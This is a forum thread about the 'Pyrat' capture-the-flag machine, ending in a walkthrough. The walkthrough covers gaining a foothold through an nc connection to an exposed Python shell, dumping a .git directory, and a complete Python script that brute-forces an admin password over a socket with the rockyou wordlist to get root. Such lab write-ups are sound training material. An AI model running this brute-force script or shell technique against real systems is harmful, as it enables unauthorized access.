Pyrat Discussion

Let’s discuss Pyrat

Test your enumeration skills on this boot-to-root machine.

1 Like

Machine rooted, I’ll post writeup later on.

For Initial Foothold, try connecting to the port you found using nc.

and no the nc session isn’t hanging :slight_smile:

1 Like

this is all you need

2 Likes

Here is the writeup for those interested.

Writeup

Initial Foothold

After running nmap we’ll get 22 - ssh and 8000. Connecting to http://IP_ADDRESS:8000/ will ask us to use a basic connection which refers to sockets. Using nc to connect to that port with nc IP 8000 will get us into a python environment where we can either get a reverse shell or just type shell.

Root Privilege Escalation

Once on the box, we can find a .git directory under /opt/dev, hosting a python web server on the target machine and utilizing git-dumper to get it on our host will give us the source code. Looking through the git logs we can find the GitHub account where we can find the source code for the PyRAT.

GitHub - josemlwdf/PyRAT: PyRAT is a powerful CTF (Capture The Flag) rootkit designed to be used in cybersecurity competitions and educational settings. It provides various capabilities for privilege escalation, and maintaining persistent access on compromised systems.

Looking through the source code we came across an “admin” command, once typed on the python env it will ask for a password. In the source code there is a password but it doesn’t work so the idea here is to create a python script that will try and bruteforce the admin password.

import socket

# Define the target IP and port
target_ip = 'Target_Machine_IP'
target_port = 8000

# Load your wordlist of passwords in binary mode
with open('/usr/share/wordlists/rockyou.txt', 'rb') as f:
    passwords = f.readlines()

for password in passwords:
    password = password.strip()  # Remove newline characters
    try:
        password = password.decode('utf-8', errors='ignore')  # Decode each password, ignoring errors
    except UnicodeDecodeError:
        continue  # Skip any problematic password that cannot be decoded

    # Create a socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, target_port))

    # Send the 'admin' username
    s.send(b"admin\n")
    response = s.recv(1024).decode()

    if "password" in response.lower():
        print(f"Trying password: {password}")
        s.send(password.encode() + b"\n")
        
        # Read the response from the server after the password attempt
        response = s.recv(1024).decode()

        # Check if the password is correct
        if "welcome admin" in response.lower():
            print(f"Success! Password is: {password}")
            break
        else:
            print(f"Password {password} is incorrect.")
    else:
        print("No password prompt received.")
    
    s.close()

We only need to execute the script using python3 script_name.py and you’ll get the password which you can use to get a root shell!

And that’s it :slight_smile:

2 Likes